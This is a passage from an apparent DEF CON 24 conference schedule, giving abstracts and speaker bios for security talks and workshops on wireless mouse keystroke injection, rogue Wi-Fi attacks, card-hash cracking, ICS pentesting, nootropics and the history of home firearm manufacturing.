Dr. Phil currently works as a professor at Bloomsburg University of Pennsylvania. His research focus over the last few years has been on the use of microcontrollers and small embedded computers for forensics and pentesting. Phil has developed a custom pentesting Linux distro and related hardware to allow an inexpensive army of remote pentesting drones to be built using the BeagleBone Black computer boards. This work is described in detail in Phil's book "Hacking and Penetration Testing With Low Power Devices" (Syngress, 2015). Phil has also published books on Linux Forensics (Pentester Academy, 2015), USB Forensics (Pentester Academy, 2016), and Windows Forensics (Pentester Academy, 2016).
Prior to entering academia, Phil held several high level positions at well-known US companies. He holds a couple of the usual certs one might expect for someone in his position. When not working, he likes to spend time with his family, fly, hack electronics (find his Daddy and Daughter Electronics show on YouTube), and has been known to build airplanes.
Return to Index
DEFCON - Track Two - Saturday - 13:00-13:59
MouseJack: Injecting Keystrokes into Wireless Mice
Marc Newlin Security Researcher, Bastille Networks
What if your wireless mouse was an effective attack vector? Research reveals this to be the case for mice from Logitech, Microsoft, Dell, Lenovo, Hewlett-Packard, Gigabyte, and Amazon. Dubbed 'MouseJack', this class of security vulnerabilities allows keystroke injection into non-Bluetooth wireless mice. Imagine you are catching up on some work at the airport, and you reach into your laptop bag to pull out your phone charger. As you glance back at your screen, you see the tail end of an ASCII art progress bar followed by your shell history getting cleared.
Before you realize what has happened, an attacker has already installed malware on your laptop. Or maybe they just exfiltrated a git repository and your SSH keys. In the time it took you to plug in your phone, you got MouseJacked. The attacker is camped out at the other end of the terminal, equipped with a commodity USB radio dongle and a directional patch antenna hidden in a backpack, and boards her plane as soon as the deed is done. The reality of MouseJack is that an attacker can inject keystrokes into your wireless mouse dongle from over 200 meters away, at a rate of up to 7500 keystrokes per minute (one every 8ms).
Most wireless keyboards encrypt the data going between the keyboard and computer in order to deter sniffing, but wireless mouse traffic is generally unencrypted. The result is that wireless mice and keyboards ship with USB dongles that can support both encrypted and unencrypted RF packets. A series of implementation flaws makes it possible for an attacker to inject keystrokes directly into a victim's USB dongle using easily accessible, cheap hardware, in most cases only requiring that the user has a wireless mouse. The majority of affected USB dongles are unpatchable, making it likely that vulnerable computers will be common in the wild for the foreseeable future.
This talk will explain the research process that led to the discovery of these vulnerabilities, covering specific tools and techniques. Results of the research will be detailed, including protocol behavior, packet formats, and technical specifics of each vulnerability. Additional vulnerabilities affecting 14 vendors are currently in disclosure, and will be revealed during this talk.
Marc is a security researcher and software engineer at Bastille Networks, where he focuses on RF/IoT threats present in enterprise environments. He has been hacking on software defined radios since 2013, when he competed as a finalist in the DARPA Spectrum Challenge. In 2011, he wrote software to reassemble shredded documents for the DARPA Shredder Challenge, finishing the competition in third place out of 9000 teams.
Twitter: @marcnewlin
Return to Index
DEFCON - Track Three - Friday - 16:30-16:59
MR. ROBOT Panel
Kor Adana Writer & Technical Supervisor, MR. ROBOT
Dark Tangent Founder, DEF CON
Marc Rogers
Ryan Kazanciyan Chief Security Architect, Tanium
Andre McGregor Director of Security, Tanium
Kim Zetter Senior Staff Reporter, Wired
MR. ROBOT is a rare treat - a network television show whose hacker protagonist is a fully realized character with a realistically attainable set of skills. No hyper-typing, no gibberish masquerading as tech jargon, no McGuffins to magically paper over plot holes with hacker dust. MR. ROBOT takes the tech as seriously as the drama.
One of the main reasons for this verisimilitude is the work of Kor Adana, MR. ROBOT's advisor on all things hackish. His fingerprints are on every terminal window in the show. Another advisor to the show is our very own CJunky - known to the outside world as hacker and raconteur Marc Rogers. Join Dark Tangent for a panel discussion of MR. ROBOT: the phenomenon, the hacks and the crazy ways the show seems to pull its storylines from the future. Bring your questions, and keep an eye out for late-breaking special guests.
Kor Adana’s interest in technology started as a child when he tried to build a red box to get free calls on pay phones. By the time he was in middle school, he was building his own computer systems and getting into trouble. After obtaining a B.S. in IT Network Administration, Kor went on to work in enterprise network security for one of the world’s largest automakers. He performed penetration testing, designed security policies, managed enterprise-wide eDiscovery, and conducted forensics for legal and HR matters. While there, he also worked alongside NASA in a high-profile government investigation. He eventually left the IT world to pursue his true passion, writing for film and television. He’s worked with the producers of THE WALKING DEAD, THE SHIELD, LOST, and DEXTER. He is currently a writer and technical supervisor for USA's Golden Globe Award-winning drama, MR. ROBOT. He also has one of his own projects in development with Universal Cable Productions.
Ryan Kazanciyan is the Chief Security Architect for Tanium and has thirteen years of experience in incident response and forensics, penetration testing, and security architecture. Prior to joining Tanium, Ryan was a technical director and lead investigator at Mandiant, where he worked with dozens of Fortune 500 organizations impacted by targeted attacks.
Ryan has presented security research at dozens of events worldwide, including Black Hat, DEFCON, and RSA. He has led training sessions for hundreds of the FBI's cyber squad agents, and was a contributing author for "Incident Response and Computer Forensics, 3rd Edition", published in 2014.
Andre McGregor is at DEFCON 24 celebrating his one-year anniversary as Tanium’s Director of Security responsible for internal cybersecurity. Prior to joining Tanium, Andre was a fresh-faced new agent with the FBI working cases like the NYC Subway bomber and Times Square car bomb while arresting his share of Italian Organized Crime bosses. His computer engineering background led him to help form FBI New York’s first cyber national security squad focused on computer intrusions from China, Russia, and Iran. Having deployed with NSA Blue Team and DHS US-CERT/ICS-CERT as a technically-trained cyber agent, Andre has led numerous large-scale cyber investigations ranging from financial crimes to critical infrastructure protection. In his free time, when he wasn’t sifting through terabytes of Netflow with SiLK and playing around with Autopsy and IDA, Andre was an FBI firearms instructor, dive team medic, and a volunteer firefighter driving fire trucks. After graduating from Brown University, Andre worked as an engineer at Goldman Sachs and later transitioned to IT Director at Cardinal Health/Advogent. Having shed the badge and gun last year, Andre currently serves as the FBI cyber technical consultant for the TV show Mr. Robot.
Kim Zetter is an award-winning, senior staff reporter at Wired covering cybercrime, privacy, and security. She is writing a book about Stuxnet, a digital weapon that was designed to sabotage Iran's nuclear program.
Dark Tangent & Marc Rogers Bios to come
Return to Index
Wireless - Skyview 1 - Saturday - 16:00-16:30
Tom Hayes
Bio
Lifelong student, researcher, and public infrastructure enthusiast.
@tomx4096
Abstract
Wireless standards that divide their frequency band into channels pose a fundamental challenge to wardrivers: what frequency is the target on? The traditional approach is to scan the spectrum, either actively or passively, to try to discover unknown wireless networks while passing them. Single-frequency scans carry the risk of not finding networks or being foiled by frequency hopping strategies. The wardriving of tomorrow should mitigate these risks with "full-take" spectrum captures that eavesdrop on every channel simultaneously.
IEEE 802.15.4 is a simple wireless protocol that has 16 channels in the unlicensed 2.4 GHz band, and is gaining traction in the IoT world. Many hacking tools like KillerBee and Api-Mote have been developed for it, which rely on scanning to find new networks. Recent approaches to multi-channel 802.15.4 sniffing use either software defined radio or a cluster of existing sniffers. These approaches can be expensive, clunky, and sometimes do not cover every channel. We promote a third, hardware based approach based on multiple radio transceivers embedded into a single device. This talk features a short analysis of IEEE 802.15.4 sniffing technologies and presents a new design for a multi-channel sniffer.
Return to Index
BHV - Skyview 4 - Friday - 11:30-11:59
Speaker: Rafael Fontes Souza
About Rafael:
Rafael Fontes Souza aka b4ckd00r is a Senior Information Security Consultant at CIPHER. He is a core member of Cipher Intelligence Labs - the advanced security team focused on penetration testing, application security and computer forensics for premier clients. He started studying at age 13 and since then has disclosed security vulnerabilities and has received recognition and awards from major companies such as Apple, Microsoft, ESET, HP and others. He has done hundreds of successful penetration tests for various organizations, including government, banking and commercial sectors, as well as the payment card industry.
Abstract:
This presentation is about a creative approach to intrusion tests. As the popular saying goes, "The dog is man's best friend" (he makes you feel good and secure). Let's explore the vulnerability of layer eight, the human being, subject to error and to social engineering techniques. This is an innovative method, with art and style, and simpler than it sounds: the dog will be used as an attack tool, carrying a mobile phone hidden in its pectoral collar.
The attack vectors are triggered automatically without any human interaction. This may include geographically close attacks, such as fake Wi-Fi access points, cellular base stations or local user attacks on a network; these can exploit DNS hijacking, packet injection, Evil-Twin, rogue router or ISP, and many other variants.
Furthermore, the target will connect to the rogue Wi-Fi access point, and the rules and DHCP configuration allow the fake AP to allocate IP addresses to the clients and forward traffic to a fake/malicious web site. The information can then be stored easily, as can a malicious file be injected to remotely control the victim.
And it's done. You can drop your hacker dog in a park and expect him to hack people for you, quietly, that's perfect!
Return to Index
BHV - Skyview 4 - Sunday - 13:30-13:59
Speaker: Dr. Stanislav Naydin and Vlad Gostomelsky
About Dr. Stanislav Naydin:
Dr. Stanislav Naydin is a neurology resident with a background in pharmaceutical sciences. He is heavily focused on procedure-based medicine. He has been involved in a multitude of advanced surgeries and interventions. Prior to transitioning to the medical field, Stanislav was an industrial robotics designer and programmer in the glass industry.
About Vlad Gostomelsky:
Vlad Gostomelsky is a driven security researcher with a passion for securing technology that makes civilized life possible. He is particularly focused on satellite systems security, SCADA systems supporting the critical infrastructure and wireless networks. He specializes in the intersection of physical and network security.
We will engage the audience in a discussion of modern technological advances along with their ethical implications. We live in an era where the very implanted hardware that keeps you alive can be evidence in a court of law. Neuroscience is now a tool used by marketing firms. Following this discussion on medical ethics we will continue with a show and tell of some recent cases where medical devices were used as evidence against the patients. We will also discuss some of the medical devices we have tested in the past year and the vulnerabilities that were discovered.
Return to Index
BHV - Skyview 4 - Friday - 16:30-16:59
Speakers: Gingerbread
About Gingerbread:
Long-time Security malcontent Gingerbread, having been eliminated early on in this year's "Pop-and-Lock Potluck" (the nation's *premier* overweight break dancing competition), has returned to DEF CON with even more of his half-baked theories, bro-science, and questionable supply chain advice for your enjoyment. Early adopter of the "Not for human consumption" defense, Gingerbread has spent years conducting extensive research in the areas of cognition enhancing drugs and lifestyle regimens and in the process has become a walking encyclopedia of things NOT to do.
Abstract:
Everything is impossible until it isn't.
Every undertaking, defined by the hard limitations at the edges of our possible achievement.
Lossless electrical conductivity, human travel beyond the sound 'barrier', running a four-minute mile...each, seen as some unassailable foe until, one-by-one, these milestones were not just approached and then attained, but very often surpassed. With time, these limits transition from the superlative, to the standard, and what once was thought of as impossible, now becomes the benchmark of superior performance.
The world of cognition enhancing drugs is no different.
For nearly as long as such structures have been differentiated, the cells of the brain and nervous system have been acknowledged to behave very differently than most of the others in the body.
Unlike the perpetual turnover that the rest of the body enjoys, there are only a few restricted areas in the brain and CNS of adult humans where new nerve cells are being regularly created. What you are born with is what you have to work with.
Or is it?
Reliably producing productive structural, as opposed to solely chemical, changes to the brain has long been seen as the 'Holy Grail' of nootropics research. I am here today to discuss why the term "four-minute mile" may be a bit more appropriate.
From the explosions of growth created in early childhood and in some illnesses, to the seemingly paradoxical benefits seen with the removal of malfunctioning structures, we are going to examine the sometimes baffling relationship between cognition and the physical structure of the brain, and how maybe, just maybe, there might be something you can do about it.
Return to Index
DEFCON - DEF CON 101 - Saturday - 13:00-13:59
NG9-1-1: The Next Generation of Emergency Ph0nage
CINCVolFLT (Trey Forgety) Director of Government Affairs & IT Ninja, NENA: The 9-1-1 Association
AK3R303 (Alex Kreilein) CTO & Co-Founder, SecureSet
For 48 years, 9-1-1 has been /the/ emergency telephone number in the United States. It's also been mired in 48-year-old technology. So let's just put that on the internet, right? What could possibly go wrong? Without the radical segmentation of the PSTN, the move to IP networks (even the private, managed kind) will bring new 9-1-1 capabilities AND new vulnerabilities. This talk builds on the work of quaddi, r3plicant, and Peter Hefley (see "Hacking 911: Adventures in Destruction, Disruption, and Death," DEF CON 22, http://ow.ly/10AvZh). It provides an overview of NG9-1-1 architecture and security concerns, and identifies critical attack surfaces that Public Safety Answering Points need to monitor and secure. Familiarity with NENA's i3 and NG-SEC standards may be helpful, but is not required.
CINCVolFLT (Trey Forgety) is Director of Government Affairs for NENA: The 9-1-1 Association. He previously served as a Presidential Management Fellow in the U.S. Department of Homeland Security's Office of Emergency Communications, with rotations in the Federal Communications Commission's Public Safety and Homeland Security Bureau, and the U.S. Department of Commerce's National Telecommunications and Information Administration. A sometimes-piratical sailor and inveterate tinkerer, CINCVolFLT's recent activities have included work on establishing a backup timing source for telecom networks to ensure service during GPS outages or jamming, and serving as pro bono counsel to QueerCon. He holds a B.S. in Applied Physics and a J.D., both from the University of Tennessee (GO VOLS!).
Twitter: @cincvolflt
AK3R303 (Alex Kreilein) is Managing Partner and CTO of SecureSet, which is a cybersecurity services provider specializing in education and startup acceleration. Previously, AK3R303 was a Technology Strategist with the U.S. Department of Homeland Security and a Guest Researcher at the National Institute of Standards and Technology focusing on public safety and mobile communications network security. He holds a B.A. from Fordham University where he studied nuclear game theory through the political science department in Beijing, China. He holds an M.A. in National Security & Strategic Studies from the US Naval War College, and is an M.S. / Ph.D. candidate at the CU Boulder College of Engineering & Applied Sciences in Telecom Engineering.
Twitter: @ak3r303
Return to Index
Workshops - Las Vegas Ballroom 5 - Saturday - 10:00-14:00
Ninja level Infrastructure Monitoring : Defensive approach to Security Monitoring & Automation
Madhu Akula Automation Security Ninja, Appsecco
Riyaz Walikar Chief Offensive Security Officer, Appsecco
For most network engineers who monitor the perimeter for malicious content, it is very important to respond to an imminent threat originating from outside the boundaries of their network. Having to crunch through all the logs that the various devices (firewalls, routers, security appliances etc.) spit out, correlating that data and making the right choices in real time can prove to be a nightmare, even with the solutions already available in the market.
As I have experienced this myself in several cases, as part of internal DevOps and Incident Response teams, I would like to create a space for interested folks to design, build, customize and deploy their very own FOSS-based centralized visual attack monitoring dashboard. This setup would be able to perform real-time analysis using the trusted ELK stack and visually denote what popular attack hotspots exist on a network.
Madhu Akula is an Automation Security Ninja at Appsecco, a company that specializes in Web Application Security. His primary interests lie with application & cloud security, DevOps and Automation. He is a security and DevOps researcher with over 3 years of experience in the industry. He has expertise in building scalable and secure infrastructure, and has implemented security solutions and worked with different clients across the government, e-commerce and IT industries.
His research has been selected for ToorCon, DefCamp, SkydogCon, NoloCon, etc. in the past. He has been a keynote speaker for the National Cyber Security conference in Dayananda Sagar College conducted by CompTIA.
Madhu Akula is also an active member with Bugcrowd, Hackerone, Synack etc. He has found vulnerabilities in open source products/platforms such as WordPress, Ntop, Opendocman etc. and is also a contributing bug hunter with Code Vigilant (a project to Secure Open Source Software). His research has identified many vulnerabilities in over 200 organizations including US Department of Homeland Security, Google, Microsoft, Yahoo, Adobe, LinkedIn, Ebay, At&t, Blackberry, Cisco, Barracuda etc.
Riyaz Walikar is the Chief Offensive Security Officer at Appsecco, a company that specializes in Web Application Security. His primary interests lie with application security, penetration testing and security evangelism. He is a security evangelist, offensive security expert and researcher with over 9 years of experience in the Internet and web application security industry. He has many years of experience providing web application security assessments, has led penetration testing engagements in many countries and performed numerous onsite reviews on infrastructure and system security.
He also leads the Bangalore chapters of OWASP and the null community, actively encouraging participation and mentoring newcomers in the industry.
Riyaz is also a frequent speaker at security events and conferences around the world including BlackHat, nullcon, c0c0n, xorconf, OWASP AppsecUSA.
He also dabbles in vulnerability research and has found bugs with several popular online services of major companies including Facebook, Twitter, Google, Cisco, Symantec, Mozilla, PayPal, and EBay.
Max Class Size: 55
Prerequisites for students: Comfortable with basic Linux commands
Materials or Equipment students will need to bring to participate: Students will need a laptop with admin privileges and at least 20GB of free space for virtual machines (students will need VirtualBox installed)
Return to Index
Workshops - Las Vegas Ballroom 5 - Friday - 14:00-18:00
Nmap NSE development for offense and defense
Paulino Calderon Co-founder, Websec
Tom Sellers Security Researcher
This workshop will teach participants how to use the Nmap Scripting Engine (NSE) to extend the power and capabilities of Nmap. It will cover the basics of the Nmap usage, NSE, and the Lua programming language before diving into how to solve problems by writing custom scripts. By the end of the workshop you will have in depth knowledge of the Nmap Scripting engine and how to develop scripts for offensive and defensive tasks. Participants will be provided with a virtual machine that they can use during the training.
Paulino Calderon (@calderpwn) has been in Information Security for more than 10 years. He is the co-founder of Websec, a company offering information security consulting services based in Mexico and Canada. He loves learning new technologies, conducting big data experiments, and developing and destroying software.
In 2011 Paulino joined the Nmap team during the Google Summer of Code program to work on the project as an NSE developer. He focused on improving the web scanning capabilities of Nmap and has kept on contributing to the project since then. He has also published ‘Nmap 6: Network Exploration and Security Auditing Cookbook’ and ‘Mastering the Nmap Scripting Engine’ covering practical tasks with Nmap and NSE development. He loves attending information security conferences and has given talks and workshops at over 20 events in Canada, the United States, Mexico, Colombia, Peru and Bolivia.
Tom Sellers (@TomSellers) is a Security Researcher in the Rapid7 Labs team. He has spent 20 years in IT, 10 of which in InfoSec. He has been responsible for defensive Information Security for companies in the finance, service provider, and security software industries. He started contributing to Nmap in 2007 with his contributions primarily focusing on service and operating system detection. He has also contributed multiple modules to the Metasploit Project.
Max Class Size: 35
Prerequisites for students: Participants should be familiar with basic TCP/IP networking, general security concepts, and basic Nmap usage. Previous programming experience would be helpful but isn’t required.
Materials or Equipment students will need to bring to participate: Participants will need a computer with VMware Player, VMware Fusion, or VirtualBox. USB thumbdrives with the target virtual machine images will be available.
Return to Index
BHV - Skyview 4 - Sunday - 13:30-13:59
Speaker: GingerBread
@the_real_gbm
hac.kthepla.net
About GingerBread:
Gingerbread man is an Information Security cookie from the greater Denver area. Requiring little sleep, and seemingly immune to alcohol, he is consistently seen at hacker events across the country while never seeming to actually do any work. With no verifiable credentials or formal training, there is the strong possibility he is making all of this stuff up.
Abstract:
GingerBread will present one man's take on the current state of nootropics and other cognition-enhancing drugs, beginning with the neuro-enhancing drugs of the ancient Ayurveda and Traditional Chinese Medicine, working through the developments of the 1990s and 2000s, and finishing with the chaotic internet-connected and unregulated world of today.
From Gingko Biloba to Pig Brain Concentrates, from cutting-edge science in million-dollar state of the art labs, to the crowd sourcing of syntheses for never-before-tested-in-man substances to be manufactured by the lowest bidder and distributed to the public wholesale.
I will present a few case study examples of both objective successes and undeniable failures with self-experimentation. GingerBread will try and explain (to the best of my ability) a bit of what we know about the action of these drugs, why we think we know it, as well as ongoing developments in the fight to preserve cognition in the elderly and infirm and to push the abilities of healthy individuals past their biological limitations.
Return to Index
WOS - Skyview 6 - Saturday - 13:10-13:59
Now You See Me, Now You Don't
Joseph Muniz, Architect and Researcher at Cisco
Aamir Lakhani, Senior Security Researcher at Fortinet
Many people leave behind bread crumbs of their personal life on social media, within systems they access daily, and on other digital sources. Your computer, your smartphone, your pictures and credit reports all create an information-rich profile about you. This talk will discuss all the different threats that leak your information and how attackers can use open source intelligence to find you. We will discuss techniques used by law enforcement and private investigators to track individuals. Learn how you can protect your online footprint, reduce your digital trail, and secure your privacy.
Joseph Muniz (Twitter: @SecureBlogger) is an architect and researcher at Cisco Systems. He has extensive experience in designing security solutions for the top Fortune 500 corporations and the US Government. Joseph's current role gives him visibility into the latest trends in cyber security both from leading vendors and customers. Joseph runs The Security Blogger website, a popular resource for security and product implementation. He is the author of and contributor to several publications including a recent Cisco Press book focused on security operations centers (SOC).
Aamir Lakhani (Twitter: @aamirlakhani)
Return to Index
DEFCON - DEF CON 101 - Friday - 15:00-15:59
Eavesdropping on the Machines
Tim ‘t0rch’ Estell Solution Architect, BAE Systems
Katea Murray Cyber Researcher, Leidos
After the Rise of the Machines they'll need to communicate. And we'll need to listen in. The problem is that proprietary protocols are hard to break. If Wireshark barfs then we're done. Or can we listen in, break their Robot Overlord messages and spill it all to the meat-space rebels? Attend this talk to learn techniques for taking network data, identifying unknown protocols, and breaking them down to something you can exploit. Rebels unite!
Tim Estell, a hacker since learning how to mod a TRS-80 game in the ‘80s. Since then he’s reversed protocols, leveraged hardware, and managed teams for many concepts of operation. He remains convinced machines will never exceed meat space innovation and so welcomes our new Robot Overlords, if only because their cause is lost. Rebels unite!
Katea Murray, a programmer who turned to hacking in the early 00’s, she’s reversed and co-opted many tools and toys consumers touch, from old-school boat anchors to the latest mobile devices. Along the way she’s pulled recruits to the rebel cause through internships, outreach, and high energy. When she’s not watching sports she’s hacking as a sport. Game on!
Return to Index
CPV - Bronze 2 - Saturday - 10:30-11:00
Talk Title:
Oops, I Cracked My PANs
Speaker Name, Employer or position:
qu0rum
Abstract:
PCI DSS allows hashing as a technique for tokenizing or protecting stored cardholder data, calling hashes irreversible. Interestingly, PCI does not require using salts or other advanced hashing techniques to strengthen these hashes. Using oclHashcat with a custom patch of our own, a list of valid IINs, and a GPU cracking rig, we will show how to reverse the supposedly irreversible one-way hashes of payment card numbers, ultimately demonstrating that we can completely crack a PCI Compliant database of hashed PANs in a few hours.
Bio:
qu0rum started life as a developer during the dot com boom and quickly realized that writing secure code is a lot harder than breaking other people's code, so he hooked up with a security consulting company and got into penetration testing back before that was a popular thing to do. 15 years later he has handed off the day-to-day pen testing responsibilities to a new generation of testers and spends most of his time working with clients' executives, convincing them that they should have someone test their security and figuring out what their testing programs should look like, but he's still breaking stuff and writing about it in a desperate attempt to save the world from its own horrible code.
As his straight-laced corporate alter-ego, qu0rum has presented at a number of information security conferences including Black Hat Briefings USA, RSA Conference, Infosec World, the ISSA Conference, Computerworld Expo, and at United States Secret Service Electronic Crimes Task Force meetings. His commentary has been featured in television and print information security news, including CBS Evening News, NBC News, CNN Money, USA Today, CSO Magazine, Secure Computing Magazine, Network Computing Magazine, and CRN.
Social media links if provided:
@qu0rum
Return to Index
Workshops - Las Vegas Ballroom 7 - Thursday - 15:00-19:00
Open Source Malware Lab
Robert Simmons Director of Research Innovation, ThreatConnect, Inc.
The landscape of open source malware analysis tools improves every day. A malware analysis lab can be thought of as a set of entry points into a tool chain. The main entry points are a file, a URL, a network traffic capture, and a memory image. This talk is an examination of the major open source tools that satisfy the analysis requirements for each of these entry points. Each tool’s output can potentially feed into another tool for further analysis. The linking of one tool to the next in a tool chain allows one to build a comprehensive automated malware analysis lab using open source software.
For file analysis, the three major versions of Cuckoo Sandbox will be examined. To analyze a potentially malicious URL, the low-interaction honeyclient, Thug, will be covered. Next, if one has a network capture (PCAP) to analyze, the Bro Network Security Monitor is a great option, and will be covered. Finally, if the analysis target is a memory image, the Volatility Framework will be examined. Each of the inputs and outputs of the tools will be reviewed to expose ways that they can be chained together for the purpose of automation. For each tool covered, the class will log in to live instances of each and learn the basics of malware analysis using each one.
Robert Simmons is the Director of Research Innovation at ThreatConnect, Inc. With an expertise in building automated malware analysis systems based on open source tools, he has been tracking malware and phishing attacks and picking them apart for years. Robert is also the author of PlagueScanner, an open source virus scanner framework.
Robert, also known as Utkonos, has a background in biology, linguistics, and Russian area studies. He has lived extensively in Russia and Ukraine and has been known to swear profusely and constantly in Russian.
Max Class Size: 55
Prerequisites for students: None
Materials or Equipment students will need to bring to participate: Bring a laptop with the current version of Chrome installed and a tested and working network connection (provide your own internet, please - only rely on the conference network if absolutely needed). Everything is remote and connected to via web browser - no malware will be worked on your equipment. Everything is remote.
Return to Index
Workshops - Las Vegas Ballroom 1 - Thursday - 10:00-14:00
Operation Dark Tangent: The DEF CON Messaging Protocol (DCMP)
Eijah Founder, demonsaw
The war with the Machines has been brutal. We've suffered so many casualties. And now we're weak, and the Machines know it. New D.C. is the last remaining human stronghold. Right now the Machines are preparing for one final assault that, if successful, will mean the end of all humanity. But it gets even worse. We've just received word that our leader, the Dark Tangent, has been captured. Without him we'll be unable to defend ourselves or mount a counter strike.
Your mission is to lead a group of brave hackers to rescue the Dark Tangent. But before you can do that you'll need to work together to devise a secure messaging protocol that the Machines won't be able to break. This secure protocol is vital so that the troops can communicate in secret during the operation without the Machines figuring out what we're doing. It's all up to you now. Do you have what it takes to defeat the Machines? Will you save us all?
This is a completely different kind of workshop. I'll present a very specific infiltration scenario with attack vectors that we can expect the Machines to use, e.g. session hijacking, message poisoning, replay and MITM attacks, etc. As a group we'll then work through our mission objectives and design a messaging protocol that will allow us to communicate securely. Finally, we'll implement the protocol in C++ and use it to communicate with each other in real-time. If everything works as expected we'll be able to defeat the Machines and rescue the Dark Tangent. If not… then all of humanity is lost.
Please note that this is an intermediate-level, technical workshop and requires that attendees have a strong working knowledge of C/C++. Bring your laptop, a USB flash drive, and your favorite C/C++ 11 compiler (>= gcc/g++ 4.7 or msvc 2013).
Eijah is the founder of demonsaw, a secure and anonymous information sharing program. For the last 5 years he was also a Senior Programmer at Rockstar Games where he worked on Grand Theft Auto V for PS3, Xbox 360, PS4, Xbox One, and PC. Eijah has over 15 years of software development and IT Security experience. His career has covered a broad range of Internet and mid-range technologies, core security, and system architecture. Eijah has been a faculty member at multiple colleges, has spoken about security and development at DEF CON and Hack Miami conferences, and holds a master’s degree in Computer Science. Eijah is an active member of the hacking community and is an avid proponent of Internet freedom.
Max Class Size: 55
Prerequisites for students: Previous experience in C/C++ is required along with at least a basic understanding of cryptographic fundamentals.
Materials or Equipment students will need to bring to participate: Laptop with Windows, Linux, or OSX. USB flash drive for saving their progress.
Return to Index
SkyTalks - Skyview 3 - Saturday - 16:00-16:59
Speaker: Gingerbread
Talk: Oops! I made a machine gun: The Progressive Lowering of the Barrier to Entry in Firearms Manufacturing
Long considered only the province of skilled craftsmen, firearm manufacturing has remained an arcane and esoteric skill even into the modern day. Generally requiring specialized tools and materials, this activity has always been out of the hands of the shade-tree experimenter except in the most crude and rudimentary examples.
Or has it?
Together we will explore various attempts to put the manufacturing of firearms within the reach of your average citizen, the associated motivations of the principal characters involved, and the legal ramifications and legal *clarifications* that have resulted from these efforts.
Through the work of early survivalist authors like Kurt Saxon and Ronald Brown, as well as more sophisticated offerings from the likes of Bill Holmes, Gerard Metral and P.A. Luty we can see an evolving movement of practical design and extensive experimentation in the domestic manufacturing of firearms. Various designs and levels of sophistication will be discussed.
Next, we will look at more modern efforts focused on legal definitions and regulatory circumvention. It is in this space that 80% lower receivers and flat-AKs exist.
And finally we will look at the elephant in the room: the 3D printing of firearms. Far beyond the efforts of Cody Wilson and the highly publicized Liberator pistol, we will also look at previous attempts at high-tech clandestine weapons manufacturing using CNC routers and laser scanning, an evolving community of weapons designers and manufacturers built around these construction methods, as well as important legal clarifications that have been brought on by this type of activity.
As will be all-too-clear at the end of the night, in order to get a gun we don't need no stinking background check.
Return to Index
CPV - Bronze 2 - Saturday - 12:00-12:30
Talk Title:
Overview and evolution of password-based authentication schemes
Speaker Name, Employer or position:
Ignat Korchagin
Abstract:
The password is the oldest and the most widely used pillar of authentication, and is still the core of approximately 80% of authentication events on the 21st century Internet. As the data on the Web becomes more valuable, more sophisticated attacks on authentication are being developed. The good thing is that the crypto community tries to keep up with the continuously increasing threat surface and provides more advanced authentication techniques with higher security guarantees. However, the password is still a solid building block in each of them: the first step of most two-factor authentication schemes is a password challenge; to generate a one-time token, you enter a password; to use a hardware device, you enter a password into the device. But is verifying passwords secure? By communicating a password to a verifying party you leak at least some of the password information. Given the long history of password-based authentication schemes we can clearly see that it is rather challenging even to properly implement password verification. The presentation gives an overview of the evolution of password-based authentication schemes and provides a comparison between two of the latest ones: the socialist millionaires protocol and SPAKE2.
Bio:
Ignat is a security engineer at CloudFlare working mostly on platform and hardware security. Ignat's interests are cryptography, hacking, and low-level programming. Before CloudFlare, Ignat worked as a senior security engineer for Samsung Electronics Mobile Communications Division. His solutions may be found in many older Samsung smart phones and tablets. Ignat started his career as a security researcher in the Ukrainian government's communications services.
Social media links if provided:
@secumod
Return to Index
Demolabs - Table 5 - Saturday - 16:00-17:50
OWASP ZSC Shellcode
Johanna Curiel
Ali Ramzoo
OWASP ZSC is open source software written in Python that lets you generate customized shellcode and convert scripts into obfuscated scripts. This software can be run on Windows/Linux/OSX under Python.
Johanna Curiel is a software developer with an emphasis on secure coding. She is an active OWASP volunteer and has mainly worked in the areas of software development, testing and quality control. She understands different types of programming languages such as Java and PHP and different types of scripting languages. At the moment she works as an independent security engineer and researcher, living in the Dutch Caribbean.
Ali Ramzoo is the OWASP Iran Chapter leader and architect of the OWASP ZSC tool. He recently graduated from Sadra University - Tehran, and right now works as the Chief Technology Officer at Faranegar Knowledgeware Company (FaraSecurity) in Iran.
Return to Index
Demolabs - Table 2 - Saturday - 16:00-17:50
OXML XXE
Willis Vandevanter
The tool assists the user in inserting XML-based exploits (e.g. XXE) into different file types. The goal is to programmatically test for XML-based attacks in web applications or software that allow for file imports.
Willis Vandevanter is a principal at Silent Robot Systems. Prior to SRS, Will was a Senior Researcher at Onapsis and Lead Penetration Tester at Rapid7. He has previously spoken at Blackhat, DEF CON, TROOPERS, and other conferences. In his spare time, he writes code and contributes to different projects.
Return to Index
Workshops - Las Vegas Ballroom 6 - Saturday - 14:00-18:00
PCB Design Crash Course: A primer to designing your own hacking tools
Seth Wahle Electronics Engineer & Hardware Hacker
Have you ever seen a system that you knew you could hack, if you could only find a way to connect to its ridiculously exotic interface? What about that idea for an awesome hacking tool you imagined but didn't know how to build? If the massive learning curve of hardware design is holding back your plans to hack the world, then this is the workshop for you!
In this workshop, you will design your own basic LAN tap (based on the throwing star LAN tap from Great Scott Gadgets). We will go from the very basics all the way to a full set of design documentation that you could use to get your hardware design mass produced.
Seth Wahle is an electronics engineer and hardware hacker. He was featured in Forbes and BBC for hacking android phones using an implanted NFC chip in 2015. Seth has developed hardware that allows for 4k streaming video, produced a device that detects and eliminates enemy I.E.D.’s, and developed radio communications equipment for the next generation of fighter jets. Now as the lead engineer for Cyberdonix, Seth is developing next-gen I.O.T. based security appliances.
Max Class Size: 55
Prerequisites for students: None
Materials or Equipment students will need to bring to participate:
Return to Index
Workshops - Las Vegas Ballroom 7 - Thursday - 10:00-14:00
Pentesting ICS 101
Arnaud Soullie Senior Consultant, Solucom
There is a lot of talk about ICS, SCADA and such nowadays, but only a few people have the opportunity to get their hands dirty and understand how it works. The goal of this workshop is to give the knowledge required to start attacking SCADA networks and PLCs, give hands-on experience on real devices, and have fun hacking a model train!
In this workshop, you will learn the specifics of performing a penetration test on industrial control systems, and especially on Programmable Logic Controllers (PLCs). We will cover the main components and the commonly associated security flaws of industrial control systems, aka SCADA systems. We will discover how they work and how they communicate with the SCADA systems, to learn the methods and tools you can use to p*wn them.
Then we will move on to the real world by attacking real PLCs from two major manufacturers on a dedicated setup featuring a robot arm and a model train!
Arnaud Soullié is a senior consultant at Solucom, where he performed 120+ security audits and pentests. He has a specific interest in Active Directory security as well as ICS, two subjects that tend to collide nowadays. He teaches ICS security and pentests workshops at security conferences (BlackHat Europe 2014, BSides Las Vegas 2015, Brucon 2015) as well as full trainings (Hack In Paris 2015).
Max Class Size: 20
